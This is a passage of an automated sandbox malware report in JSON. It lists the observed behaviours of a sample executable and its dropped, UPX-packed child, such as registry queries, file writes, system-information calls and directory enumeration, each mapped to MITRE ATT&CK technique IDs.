\"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\version.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"37F4E946A327C514557E2FD916BE242779596BB62AF9C77F39FF2CB9F60FC23A\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARSINGNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005656]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5501088'}\" (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5501024'}\" (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" queries volume information of \"C:\\\" at 00000000-00005640-0000010C-164938\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-654897\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005476-0000010C-484575", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" queries volume information of \"C:\\\" at 00000000-00005640-0000010C-164938\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-654897\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005476-0000010C-484575", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c00105b2c000b5b2c00000000000000000000002900000000019cdd22000000000000eb220095e1b7772f367700feffffff435cbb775059bb77aa000000b80000000a5b2c00085b2c0024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5cba7760d8ad75ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edbb77325b2c00a06a91758600000024df22005ce322000000000086008800a06a917524df2200916c9175325b2c00a06a9175a06a917594e3220002020000 (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005640)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0098672b0093672b00000000000000000000002800000000019cdc22000000000000ea220095e1b777f3397700feffffff435cbb775059bb77aa000000b800000092672b0090672b0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5cba7760d8ad75ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edbb77ba672b00a06a91758600000024de22005ce222000000000086008800a06a917524de2200916c9175ba672b00a06a9175a06a917594e2220002020000 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00bc77d600bc776fdeee7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00005656)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005476)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005640)\n \"37f4e946a327c514557e2fd916be242779596bb62af9c77f39ff2cb9f60fc23a.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005640)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: 